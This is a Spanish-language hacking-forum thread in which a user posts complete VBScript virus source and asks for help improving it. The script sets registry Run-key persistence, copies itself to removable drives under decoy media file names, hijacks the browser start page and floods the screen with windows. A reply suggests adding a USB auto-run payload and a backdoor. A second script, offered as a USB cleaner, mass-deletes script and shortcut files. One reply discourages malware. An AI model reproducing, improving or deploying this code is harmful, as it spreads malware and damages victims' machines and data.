elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ayuda en mejora de virus en vbs .
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ayuda en mejora de virus en vbs .  (Leído 5,082 veces)
**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
ayuda en mejora de virus en vbs .
« en: 7 Julio 2017, 19:20 pm »

 ::)
              les pongo este virus en vbs para uqe me den consejos de
              como mejorarlo .
Código
  1. ON ERROR RESUME NEXT
  2. Dim Fobiacmsgchxxrl
  3. Dim Fobiacborrchxxrl
  4. Dim Fobiaccolchxxrl
  5. Dim zchxxrl
  6. Dim Fobianarchxxrl
  7. Dim Fobiadichxxrl
  8. Dim Fobiavalchxxrl
  9. Dim Fobiasenchxxrl
  10. Dim Fobiatecchxxrl
  11. Dim vtecchxxrl
  12. Set Fobiawshchxxrl = CreateObject("WScript.Shell")
  13. Set Fobiafsochxxrl= CreateObject("scripting.filesystemobject")
  14. Fobiawshchxxrl.regwrite "HKCU\software\" & Chr(71) & Chr(97) & Chr(116) & Chr(101) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116),Chr(71) & Chr(101) & Chr(111) & Chr(99) & Chr(105) & Chr(116) & Chr(105) & Chr(101) & Chr(115) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(103) & Chr(97) & Chr(116) & Chr(101) & Chr(115) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116)
  15. Fobiafsochxxrl.copyfile wscript.scriptfullname,Fobiafsochxxrl.GetSpecialFolder(0)& "\camila.vbs"
  16. Fobiawshchxxrl.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kuasanagui","wscript.exe " & Fobiafsochxxrl.GetSpecialFolder(0) & "\camila.vbs %"
  17. Const Wri = 2
  18. Const Cr = True
  19. Dim File
  20. Dim F
  21. File = Fobiafsochxxrl.GetSpecialFolder(0) & "\El microbito.TXT"
  22. Set F = Fobiafsochxxrl.opentextfile(File, Wri, Cr)
  23. F.write "Quisiera ser un microbito," & vbcrlf & "que habite en tu cuerpo," & vbcrlf & "hay para estar muy calientito," & vbcrlf & "casi todo el tiempo," & vbcrlf & "beber de tu sangre, " & vbcrlf & "y en tu carne descansar," & vbcrlf & "de ti me voy a alimentar." & vbcrlf & "" & vbcrlf & "Quiero vivir en una arteria," & vbcrlf & "junto a tu corazon," & vbcrlf & "tu cuerpo para mi seria, " & vbcrlf & "como una gran mansión," & vbcrlf & "correr por tus venas," & vbcrlf & "y en tu sangre siempre estar," & vbcrlf & "de ahi nadie me podra sacar." & vbcrlf & "" & vbcrlf & "Hare una alberca en tu ombliguito," & vbcrlf & "pa meterme a nadar," & vbcrlf & "y si me voy mas abajito," & vbcrlf & "nadie me sacara," & vbcrlf & "beber de tu sangre, " & vbcrlf & "y en tu carne descansar," & vbcrlf & "de ti me voy a alimentar." & vbcrlf & "" & vbcrlf & "De ti me voy a alimentar."
  24. F.close
  25. Fobiawshchxxrl.run "notepad " & Fobiafsochxxrl.GetSpecialFolder(0) & "\El microbito.TXT"
  26. Fobiawshchxxrl.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page","http://www.jodiendo.com"
  27. Fobiawshchxxrl.regwrite "HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\Window title","FOBIA ON ICE"
  28. If month(now) = 10 and day(now) = 31 then
  29. For zchxxrl = 0 to 1000
  30. Fobiawshchxxrl.run ("C:\Windows\notepad.exe")
  31. Next
  32. End If
  33. Fobiavalchxxrl = 0
  34. Fobiatecchxxrl = 0
  35. dichxxrl()
  36. Function dichxxrl()
  37. On Error Resume Next
  38. Do
  39. Fobiatecchxxrl = Fobiatecchxxrl + 1
  40. Fobiavalchxxrl = Fobiavalchxxrl + 1
  41. Randomize timer
  42. Fobiadichxxrl = Int(Rnd * 6)
  43. If Fobiadichxxrl = 0 then Fobianarchxxrl = "Fobia.txt"
  44. If Fobiadichxxrl = 1 then Fobianarchxxrl = "Mundo feliz.mp3"
  45. If Fobiadichxxrl = 2 then Fobianarchxxrl = "Amor chiquito.jpg"
  46. If Fobiadichxxrl = 3 then Fobianarchxxrl = "Fobia on ice.mp3"
  47. If Fobiadichxxrl = 4 then Fobianarchxxrl = "Leche.html"
  48. If Fobiadichxxrl = 5 then Fobianarchxxrl = "microbito.mp3"
  49. If Fobianarchxxrl = "" then Fobianarchxxrl = "LEEME.TXT"
  50. If Fobiavalchxxrl = 900000 then
  51. Fobiafsochxxrl.copyfile Fobiafsochxxrl.GetSpecialFolder(0)& "\camila.vbs","a:\" & Fobianarchxxrl & ".vbs"
  52. Fobiavalchxxrl = 0
  53. End If
  54. If Fobiatecchxxrl = 700000 then
  55. Fobiawshchxxrl.sendkeys "Quisiera ser un microbito...."
  56. Fobiatecchxxrl = 0
  57. Fobiatecchxxrl = 0
  58. End If
  59. Loop
  60. End Function
  61.  

*****por favor comenten algunas cosas que se deverian mejorar a este virus  :)


« Última modificación: 7 Julio 2017, 20:13 pm por fisica 638 » En línea



ivancea96


Desconectado Desconectado

Mensajes: 3.412


ASMático


Ver Perfil WWW
Re: ayuda en mejora de virus en vbs .
« Respuesta #1 en: 8 Julio 2017, 21:01 pm »

Consejos de rango 1 sobre la creación de código:
- Indenta, tabula las líneas.
- Nombres de variables legibles y concisos sobre su función en el código.

Sobre cómo mejorarlo: Haz que deje de ser un 'virus' y hazlo un programa útil. Te sirve más a ti, sirve más a quienes estén aprendiendo a programar, sirve más a todos. Al fin y al cabo, la razón de este foro es esa, aprender, no compartir "programas", y menos malware.

Te digo esto, porque varios de los temas que he visto que has abierto vienen colisionando en el mismo concepto: "malware", que está muy bien como tema curioso y como "información white-hat", pero está prohibido para su uso malicioso.


En línea

**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
Re: ayuda en mejora de virus en vbs .
« Respuesta #2 en: 8 Julio 2017, 21:32 pm »

Sobre cómo mejorarlo: Haz que deje de ser un 'virus' y hazlo un programa útil. Te sirve más a ti, sirve más a quienes estén aprendiendo a programar, sirve más a todos. Al fin y al cabo, la razón de este foro es esa, aprender.

Te digo esto, porque varios de los temas que he visto que has abierto vienen colisionando en el mismo concepto: "malware", que está muy bien como tema curioso y como "información white-hat", pero está prohibido para su uso malicioso.

********bueno creo que en parte tienes razón pero mira que solo
                  no hago virus sino tambien antivirus este vbs borra el virus de
                  acceso directo (new photo today.wsf) que se mete en los
                  pendrive (USB),ESTE CODE lo termine esta mañana.

Código
  1. 'PARA FORO EL HACKER.
  2. Set objShell = CreateObject("Shell.Application")
  3. Set objFolder = objShell.BrowseForFolder _
  4.    (WINDOW_HANDLE, "Selecciona una carpeta:", NO_OPTIONS)  
  5. Set objFolderItem = objFolder.Self
  6. strPath = objFolderItem.Path
  7. Set objfso = createobject("scripting.filesystemobject")
  8. Set archivotexto = objfso.createtextfile("desinf.bat",true)
  9. archivotexto.writeline "@echo off"
  10. archivotexto.writeline "title Desinfectando USB (BY S4L)"
  11. archivotexto.writeline "MODE CON: COLS=50 LINES=5"
  12. archivotexto.writeline "color a"
  13. archivotexto.writeline "echo/"
  14. archivotexto.writeline "echo [ÛÛÛ                           ] 13 °/."
  15. archivotexto.writeline "ping localhost -n 1 >nul"
  16. archivotexto.writeline "cd /D "" " & strPath & """"
  17. archivotexto.writeline "Attrib /d /s -r -h -s *.*"
  18. archivotexto.writeline "Attrib /d /s -r -h -s Drive\*.*"
  19. archivotexto.writeline "cls"
  20. archivotexto.writeline "echo/"
  21. archivotexto.writeline "echo [ÛÛÛÛÛÛÛÛÛ                     ] 25 °/."
  22. archivotexto.writeline "ping localhost -n 2 >nul"
  23. archivotexto.writeline "del /f /q *.bat"
  24. archivotexto.writeline "cls"
  25. archivotexto.writeline "echo/"
  26. archivotexto.writeline "echo [ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ               ] 47 °/."
  27. archivotexto.writeline "ping localhost -n 2 >nul"
  28. archivotexto.writeline "del /f /q *.wsf"
  29. archivotexto.writeline "del /f /q Drive\*.wsf"
  30. archivotexto.writeline "if exist *.lnk del *.lnk"
  31. archivotexto.writeline "cls"
  32. archivotexto.writeline "echo/"
  33. archivotexto.writeline "echo [ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ     ] 70 °/."
  34. archivotexto.writeline "ping localhost -n 2 >nul"
  35. archivotexto.writeline "del /f /q *.ws"
  36. archivotexto.writeline "cls"
  37. archivotexto.writeline "echo/"
  38. archivotexto.writeline "echo [ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ  ] 89 °/."
  39. archivotexto.writeline "ping localhost -n 2 >nul"
  40. archivotexto.writeline "del /f /q *.js"
  41. archivotexto.writeline "cls"
  42. archivotexto.writeline "echo/"
  43. archivotexto.writeline "echo [ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ] 100 °/."
  44. archivotexto.writeline "attrib -a -s -h -r /s /d"
  45. archivotexto.writeline "attrib +s +h autorun.inf"
  46. archivotexto.writeline "ping localhost -n 2 >nul"
  47. archivotexto.writeline "explorer.exe "& strPath & """"
  48. archivotexto.writeline "exit"
  49. archivotexto.close
  50. set WshShell=WScript.CreateObject("WScript.Shell")
  51. WShShell.run "desinf.bat"
  52. 'credo por S4L.
  53. 'FISICA 638
  54.  
En línea



Flamer


Desconectado Desconectado

Mensajes: 1.051


crack, crack y mas crack...


Ver Perfil WWW
Re: ayuda en mejora de virus en vbs .
« Respuesta #3 en: 9 Julio 2017, 00:28 am »

y como se propaga

saludos Flamer y no es ilegal hacer virus, es legal si lo sueltas, yo también los hago pero no los libero
En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

Kr0pl0its

Desconectado Desconectado

Mensajes: 8



Ver Perfil
Re: ayuda en mejora de virus en vbs .
« Respuesta #4 en: 21 Julio 2017, 16:50 pm »

pues podrias hacer que se auto-ejecute algun tipo de payload desde los USB, es decir una vez el virus este dentro del USB (por lo  que dices, eso hace) al conectar el USB en otro Ordenador se auto-ejecute un payload, que bien si mal no recuerdo vi algo similar hace unos días hecho casualmente en el lenguaje de programacion que estas usando.
espero mi "consejo" te sea de utilidad :) espero ver pronto metedos para eliminar/detectar ese tipo de "virus". debo decir, que al usar el payload y tengas los permisos de administrador, facilmente tambien podrias abrir paso algun tipo de backdoor para que tengas acceso al Ordenador...
« Última modificación: 21 Julio 2017, 16:53 pm por Kr0pl0its » En línea

“Concéntrate en el momento. Siente, no pienses, usa tu instinto.” Qui-Gon Jinn.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
AYUDA CON LA MEJORA DE UN LOGO!!!
Diseño Gráfico
dPix 0 1,504 Último mensaje 2 Agosto 2006, 20:54 pm
por dPix
Ayuda comprar ordenador. ¿componentes con menos margen de mejora?. RAM?
Hardware
Jnex 2 2,865 Último mensaje 7 Febrero 2012, 18:29 pm
por trasno_777
Crean una tecnología que mejora la eficacia al detectar virus
Noticias
wolfbcn 0 1,382 Último mensaje 4 Diciembre 2012, 22:22 pm
por wolfbcn
[Ayuda] MEJORA EN VB
Programación Visual Basic
Gonzah91 0 1,696 Último mensaje 13 Mayo 2013, 16:52 pm
por Gonzah91
Ayuda [Virus] Como elimino el virus que crea accesos directos en Usb
Análisis y Diseño de Malware
.:: KsV ::. 5 4,872 Último mensaje 11 Noviembre 2015, 03:58 am
por s3tH
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines